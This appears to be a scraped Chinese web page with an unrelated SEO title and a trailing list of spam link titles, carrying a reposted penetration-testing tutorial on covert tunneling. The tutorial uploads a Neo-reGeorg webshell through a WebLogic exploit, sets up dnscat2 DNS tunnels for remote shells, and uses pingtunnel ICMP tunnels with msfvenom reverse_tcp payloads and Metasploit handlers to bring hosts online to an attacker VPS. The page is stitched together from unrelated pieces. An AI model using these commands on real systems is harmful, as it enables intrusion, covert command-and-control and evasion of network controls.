当前位置: 首页 > news >正文

网站死链检测工具佛山做优化的公司哪家好

网站死链检测工具,佛山做优化的公司哪家好,长沙网站制作公司报价,广州本地新闻本文仅限于安全研究和学习#xff0c;用户承担因使用此工具而导致的所有法律和相关责任#xff01; 作者不承担任何法律和相关责任#xff01; HTTP隧道 Neo-reGeorg Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目#xff0c;目的是#xff1a; 提高可用性#xff0…       本文仅限于安全研究和学习用户承担因使用此工具而导致的所有法律和相关责任 作者不承担任何法律和相关责任 HTTP隧道 Neo-reGeorg Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目目的是 提高可用性避免特征检测 提高 tunnel 连接安全性 提高传输内容保密性 应对更多的网络环境场景下使用 靶场环境cve-2017-10271  weblogic #靶场攻击过程使用脚本工具得到shell在此略过 1.设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器 2.使用蚁剑上传JSP文件 上传至此目录可以访问到文件 /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/ 3.使用 neoreg.py 连接WEB服务器在本地建立 socks 代理代理默认端口 1080 修改配置文件vim proxychains4.conf 执行命令 #测试代理 proxychains curl 127.0.0.1:7001 DNS隧道 Dnscat2 dnscat2是一个DNS隧道工具通过DNS协议创建加密的命令和控制通道它的一大 特色就是服务端会有一个命令行控制台所有的指令都可以在该控制台内完成。包 括文件上传、下载、反弹Shell。 直连模式客户端直接向指定IP的恶意DNS服务器发起DNS解析请求。 中继模式像我们平时上网一样DNS解析先经过互联网的迭代解析最后指向我们 的恶意DNS服务器。相比直连速度较慢但是更安全。 服务端安装 apt install ruby ruby-dev git make g ruby-bundler gem install bundler git clone https://github.com/iagox86/dnscat2.git也可以先下载文件然后上传至VPS cd dnscat2/server bundle install   #如此命令报错和本地网络有关多试几次 客户端编译 Linux git clone https://github.com/iagox86/dnscat2.git   cd dnscat2/client/ make   Windows 下载Windows版本 在本地编译上传 上传已经编译好的 .exe程序 make编译之后会在此目录下生成一个dnscat可执行二进制文件。 Linux systemd-resolve占用53端口的解决方法 https://www.itren.org/319.html Dnscat2直连模式 启动服务端 ruby ./dnscat2.rb 启动客户端 vps收到会话 help windows 进入session 1: session -i 1 shell    #获取主机shell 进入session 2 : session -i 2 执行命令 whoami 直连模式流量特征:tcpdump udp dst port 53 Dnscat2中继模式 环境准备  1. 一台公网CC服务器       2. 一台内网靶机              #以win7为例 3. 一个可配置解析的域名 配置DNS域名解析 创建A记录将自己的域名解析服务器ns.hack.com指向云服务器VPS IP A类解析是在告诉域名系统,ns.hacker.com的IP地址是 xxx.xxx.xxx.xxx 创建NS记录将子域名 dns.hetian.cn 的DNS解析交给 ns.hack.com NS解析是在告诉域名系统想要知道 dns.hack.com 的IP地址就去问ns.hacker.com  vps防火墙设置开放全部UDP端口 启动服务端 ruby ./dnscat2.rb dns.xxx.xxx --secretabcd secret --指定密码 启动客户端 server #指定VPS地址 服务端收到session 3 获取shell 进入会话session -i 4 执行命令 whoami ICMP隧道 Pingtunnel ICMP隧道       通过某种信道获取了内网主机的shell但是当前信道不适合做远控的通信信道 tcp 和 udp 等传输层协议不能出网 dns 、 http 等应用层协议也不能出网只有 icmp 协议可以出网。 目的上线仅icmp协议出网的内网主机 ICMP隧道转发TCP上线MSF 1.VPS启动ICMP隧道服务端 ./pingtunnel -type server -noprint 1 -nolog 1 2.靶机启动ICMP隧道客户端 pingtunnel.exe -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:7777 -tcp 1 -noprint 1 -nolog 1 3. MSF 生成反弹 shell 的 payload 上传到靶机 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost127.0.0.1 lport9999 -f exe hot.exe 4.执行 payload 反弹 shell 到 MSF 设置侦听 msfconsole use exploit/multi/handler set lhost xx.xx.xx.xx   (vps的内网IP) set lport 8866 set payload windows/x64/meterpreter/reverse_tcp exploit 5. 靶机执行payload,msf上线 ICMP隧道转发Socks上线MSF 1. VPS启动ICMP隧道服务端 ./pingtunnel -type server -noprint 1 -nolog 1 2.靶机启动ICMP隧道客户端 pingtunnel.exe -type client -l 127.0.0.1:9999 -s VPSIP -sock5 1 -noprint 1 -nolog 1 #  icmp隧道客户端监听127.0.0.1:9999启动socks5服务     通过连接到VPS IP的icmp隧道     由icmpserver转发socks5代理请求到目的地址 VPSIP:8899 3.MSF 生成反弹 shell 的 payload 上传到靶机并执行 msfvenom -p windows/x64/meterpreter/reverse_tcp lhostVPSIP lport8866 HttpProxyTypeSOCKS HttpProxyHost127.0.0.1 HttpProxyPort9999 -f exe c2.exe 5.设置侦听 handler -p windows/x64/meterpreter/reverse_tcp -H xx.xx.xx.xx -P8866 #IP是vps的内网IP 6.MSF收到会话 可以执行命令 参考 内网渗透之内网穿透 - 先知社区 ...
http://www.dnsts.com.cn/news/221413.html

相关文章:

  • 珠宝 网站欣赏wordpress收费么
  • 微信辅助做单网站广东智慧团建系统入口
  • 做的比较好的游戏网站厦门 网站建设 公司
  • 温州网上商城网站建设昆明网站建设公司哪家好
  • html5开发手机app江门seo网络推广
  • 中国建设银行威海分行网站网页界面制作
  • 黑群辉建设个人网站wordpress在预览图上加符号
  • 策划的网站信用惠州网站建设
  • 自己如何做外贸公司网站福州网站制作设计
  • 缩短链接的网站如何做收费会员定制网站
  • 网站的优化和推广方案怎么写课程资源网站开发解决方案
  • 那个平台能免费做网站车险代理平台
  • 买机票便宜的网站建设深圳定制旗袍实体店
  • 重庆网站推广工具网络营销方式的选择
  • 韩国网站如何切换中文系统优化软件哪个最好的
  • 海南网站建设公司j建设银行信用卡网站
  • 网站开发合同 下载中国产品设计网
  • tap自助建站win7系统做网站服务器
  • 大连seo网站推广做网站需要会编程吗
  • 微网站模板开发桂林旅游几月份去最好
  • 购物网站建设代理商网络 企业网站
  • 宁波网站制作联系方式wordpress模板视频
  • 深圳俄语网站建设wordpress的网站
  • 网站推广入口html网站模板免费
  • 做网站优化找谁中建西部建设西南有限公司网站
  • 在线快速建站作品集设计
  • 地方网站发展方向网站改关键词
  • 红河州住房和建设局网站电子书店网站开发
  • c2c网站建设需求分析做网站 收费
  • 网站制作 需要什么网络技术网站运营经验分享ppt